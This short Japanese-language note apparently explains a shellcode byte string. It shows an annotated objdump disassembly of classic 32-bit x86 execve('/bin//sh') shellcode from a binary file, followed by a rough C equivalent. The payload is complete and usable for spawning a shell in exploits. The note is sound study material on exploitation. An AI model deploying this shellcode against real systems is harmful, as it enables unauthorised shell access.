\x31\xc0... が何かというと
( '-') objdump -b binary -m i386 -D --start-address 80 shine
shine: file format binary
Disassembly of section .data:
00000050 <.data+0x50>:
50: 31 c0 xor %eax,%eax
52: 50 push %eax
53: 68 2f 2f 73 68 push $0x68732f2f # "//sh"
58: 68 2f 62 69 6e push $0x6e69622f # "/bin"
5d: 89 e3 mov %esp,%ebx # ebx = "/bin//sh"
5f: 50 push %eax
60: 53 push %ebx
61: 89 e1 mov %esp,%ecx # ecx = ["/bin//sh"]
63: 89 f2 mov %esi,%edx # edx = ["/bin//sh"]
65: b0 0b mov $0xb,%al # SYS_execve
67: cd 80 int $0x80
69: 0a .byte 0xa
大雑把にこんなコード
char cmd[] = "/bin//sh";
char* args[] = { cmd, 0 };
char** envs = args;
execve(cmd, args, envs);